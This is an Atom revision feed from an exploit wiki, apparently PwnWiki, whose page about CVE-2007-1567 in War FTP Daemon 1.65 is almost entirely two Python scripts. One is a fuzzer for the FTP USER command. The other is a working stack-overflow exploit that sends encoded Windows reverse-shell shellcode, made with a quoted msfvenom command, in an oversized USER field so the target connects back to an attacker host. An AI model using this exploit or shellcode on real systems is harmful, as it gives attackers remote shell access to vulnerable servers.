<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2007-1567 War FTP Daemon 1.65堆棧緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T03:50:12Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=842&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==warftp-ftp.py== &lt;pre&gt; #!/usr/bin/python  import socket  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # 774699BF   FFE4             JMP ESP  # bad characters \x00\x...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=842&amp;oldid=prev"/>
		<updated>2021-04-01T03:22:23Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==warftp-ftp.py== &amp;lt;pre&amp;gt; #!/usr/bin/python  import socket  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # 774699BF   FFE4             JMP ESP  # bad characters \x00\x...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==warftp-ftp.py==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
import socket&lt;br /&gt;
&lt;br /&gt;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;
&lt;br /&gt;
# 774699BF   FFE4             JMP ESP&lt;br /&gt;
&lt;br /&gt;
# bad characters \x00\x0a\x0d &lt;br /&gt;
&lt;br /&gt;
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b &amp;quot;\x00\x0a\x0d&amp;quot; -a x86 --platform windows&lt;br /&gt;
&lt;br /&gt;
shellcode = (&amp;quot;\xd9\xed\xba\xda\x93\x0e\xa1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1&amp;quot;&lt;br /&gt;
&amp;quot;\x52\x31\x55\x17\x83\xc5\x04\x03\x8f\x80\xec\x54\xd3\x4f\x72&amp;quot;&lt;br /&gt;
&amp;quot;\x96\x2b\x90\x13\x1e\xce\xa1\x13\x44\x9b\x92\xa3\x0e\xc9\x1e&amp;quot;&lt;br /&gt;
&amp;quot;\x4f\x42\xf9\x95\x3d\x4b\x0e\x1d\x8b\xad\x21\x9e\xa0\x8e\x20&amp;quot;&lt;br /&gt;
&amp;quot;\x1c\xbb\xc2\x82\x1d\x74\x17\xc3\x5a\x69\xda\x91\x33\xe5\x49&amp;quot;&lt;br /&gt;
&amp;quot;\x05\x37\xb3\x51\xae\x0b\x55\xd2\x53\xdb\x54\xf3\xc2\x57\x0f&amp;quot;&lt;br /&gt;
&amp;quot;\xd3\xe5\xb4\x3b\x5a\xfd\xd9\x06\x14\x76\x29\xfc\xa7\x5e\x63&amp;quot;&lt;br /&gt;
&amp;quot;\xfd\x04\x9f\x4b\x0c\x54\xd8\x6c\xef\x23\x10\x8f\x92\x33\xe7&amp;quot;&lt;br /&gt;
&amp;quot;\xed\x48\xb1\xf3\x56\x1a\x61\xdf\x67\xcf\xf4\x94\x64\xa4\x73&amp;quot;&lt;br /&gt;
&amp;quot;\xf2\x68\x3b\x57\x89\x95\xb0\x56\x5d\x1c\x82\x7c\x79\x44\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x1c\xd8\x20\x37\x21\x3a\x8b\xe8\x87\x31\x26\xfc\xb5\x18\x2f&amp;quot;&lt;br /&gt;
&amp;quot;\x31\xf4\xa2\xaf\x5d\x8f\xd1\x9d\xc2\x3b\x7d\xae\x8b\xe5\x7a&amp;quot;&lt;br /&gt;
&amp;quot;\xd1\xa1\x52\x14\x2c\x4a\xa3\x3d\xeb\x1e\xf3\x55\xda\x1e\x98&amp;quot;&lt;br /&gt;
&amp;quot;\xa5\xe3\xca\x0f\xf5\x4b\xa5\xef\xa5\x2b\x15\x98\xaf\xa3\x4a&amp;quot;&lt;br /&gt;
&amp;quot;\xb8\xd0\x69\xe3\x53\x2b\xfa\xcc\x0c\x32\x81\xa4\x4e\x34\x74&amp;quot;&lt;br /&gt;
&amp;quot;\x8e\xc6\xd2\x1c\xe0\x8e\x4d\x89\x99\x8a\x05\x28\x65\x01\x60&amp;quot;&lt;br /&gt;
&amp;quot;\x6a\xed\xa6\x95\x25\x06\xc2\x85\xd2\xe6\x99\xf7\x75\xf8\x37&amp;quot;&lt;br /&gt;
&amp;quot;\x9f\x1a\x6b\xdc\x5f\x54\x90\x4b\x08\x31\x66\x82\xdc\xaf\xd1&amp;quot;&lt;br /&gt;
&amp;quot;\x3c\xc2\x2d\x87\x07\x46\xea\x74\x89\x47\x7f\xc0\xad\x57\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xc9\xe9\x03\x15\x9c\xa7\xfd\xd3\x76\x06\x57\x8a\x25\xc0\x3f&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\x06\xd3\x39\x54\x43\xa5\xa5\xe5\x3a\xf0\xda\xca\xaa\xf4&amp;quot;&lt;br /&gt;
&amp;quot;\xa3\x36\x4b\xfa\x7e\xf3\x6b\x19\xaa\x0e\x04\x84\x3f\xb3\x49&amp;quot;&lt;br /&gt;
&amp;quot;\x37\xea\xf0\x77\xb4\x1e\x89\x83\xa4\x6b\x8c\xc8\x62\x80\xfc&amp;quot;&lt;br /&gt;
&amp;quot;\x41\x07\xa6\x53\x61\x02&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;A&amp;quot; * 485 + &amp;quot;\xbf\x99\x46\x77&amp;quot; + &amp;quot;\x90&amp;quot; * 20 + shellcode + &amp;quot;C&amp;quot; * (5500-485-4)&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
	print &amp;quot;\nSending evil buffer...&amp;quot;&lt;br /&gt;
	s.connect((&amp;quot;192.168.1.131&amp;quot;, 21))&lt;br /&gt;
	s.recv(1024)&lt;br /&gt;
	s.send('USER ' + buffer + '\r\n')&lt;br /&gt;
	data=s.recv(1024)&lt;br /&gt;
	print &amp;quot;\nDone!.&amp;quot;&lt;br /&gt;
except:&lt;br /&gt;
	print &amp;quot;Could not connect to FTP!&amp;quot;&lt;br /&gt;
	&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==ftp-user-fuzz.py==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
import socket&lt;br /&gt;
&lt;br /&gt;
buffer = [&amp;quot;A&amp;quot;]&lt;br /&gt;
counter=100&lt;br /&gt;
&lt;br /&gt;
while len(buffer) &amp;lt; 30:&lt;br /&gt;
	buffer.append(&amp;quot;A&amp;quot;*counter)&lt;br /&gt;
	counter=counter+200&lt;br /&gt;
&lt;br /&gt;
for string in buffer:&lt;br /&gt;
	print &amp;quot;Fuzzing USER with %s bytes&amp;quot; % len(string)&lt;br /&gt;
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;
	connect=s.connect((&amp;quot;192.168.1.131&amp;quot;, 21))&lt;br /&gt;
	s.recv(1024)&lt;br /&gt;
	s.send('USER ' + string + '\r\n')&lt;br /&gt;
	s.recv(1024)&lt;br /&gt;
	s.send('QUIT\r\n')&lt;br /&gt;
	s.close()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>